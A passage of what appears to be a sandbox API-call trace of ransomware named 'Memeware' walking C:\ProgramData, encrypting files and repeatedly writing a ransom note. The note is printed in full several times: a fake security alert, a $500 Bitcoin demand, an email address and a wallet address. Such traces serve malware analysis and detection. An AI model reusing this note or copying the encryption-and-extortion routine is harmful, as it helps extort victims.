lpString2="Program Files") returned -1 [0072.459] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.459] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\.") returned 48 [0072.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.459] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.459] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.459] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.459] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\..") returned 49 [0072.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.459] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files") returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files (x86)") returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="System Volume Information") returned 1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 62 [0072.459] StrStrIW (lpFirst="WelcomeScan.jpg", lpSrch=".protected") returned 0x0 [0072.459] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0072.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.460] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.460] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.460] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.460] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.460] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt") returned 64 [0072.460] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.460] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.460] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.461] lstrlenA (lpString="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") returned 684 [0072.461] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.461] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.461] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0072.461] CloseHandle (hObject=0xb4) returned 1 [0072.461] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.461] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0072.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\RESTORE_FILES.txt") returned 57 [0072.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.462] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.462] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.463] lstrlenA (lpString="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") returned 684 [0072.463] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.463] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.463] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.463] CloseHandle (hObject=0xa4) returned 1 [0072.463] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="Windows") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files (x86)") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="$Recycle.bin") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="System Volume Information") returned 1 [0072.464] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned 36 [0072.464] lstrcmpW (lpString1="WwanSvc", lpString2=".") returned 1 [0072.464] lstrcmpW (lpString1="WwanSvc", lpString2="..") returned 1 [0072.464] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*") returned 38 [0072.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0072.464] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.464] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.464] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.464] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.464] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.464] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\.") returned 38 [0072.464] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.464] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0072.464] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0072.464] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0072.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0072.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\." (normalized: "c:\\programdata\\microsoft\\wwansvc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.464] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.464] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.464] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.464] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.464] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.464] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.465] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\..") returned 39 [0072.465] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.465] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.465] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0072.465] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0072.465] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0072.465] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0072.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\.." 
(normalized: "c:\\programdata\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.465] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0072.465] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned 45 [0072.465] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0072.465] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0072.465] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*") returned 47 [0072.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.465] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.465] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.465] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.465] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.465] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\.") returned 47 [0072.465] lstrcmpW (lpString1=".", lpString2=".") returned 
0 [0072.465] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0072.465] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0072.465] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\." (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.466] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.466] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.466] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.466] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.466] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.466] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.466] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\..") returned 48 [0072.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.466] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0072.466] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0072.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | 
out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\.." (normalized: "c:\\programdata\\microsoft\\wwansvc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.466] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.466] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.466] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt") returned 63 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.466] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.466] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0072.466] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\RESTORE_FILES.txt") returned 54 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\wwansvc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.467] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.467] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.467] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.467] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.467] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.467] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0072.468] CloseHandle (hObject=0xa4) returned 1 [0072.468] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.468] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.469] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RESTORE_FILES.txt") returned 46 [0072.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.469] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.469] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.470] lstrlenA (lpString="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") returned 684 [0072.470] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, 
nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.470] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.470] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0072.470] CloseHandle (hObject=0xac) returned 1 [0072.470] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="Windows") returned -1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files") returned -1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files (x86)") returned -1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="$Recycle.bin") returned 1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="System Volume Information") returned -1 [0072.470] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help") returned 33 [0072.470] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1 [0072.470] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1 [0072.470] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\*") returned 35 [0072.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.482] lstrcmpiW (lpString1=".", lpString2="Program 
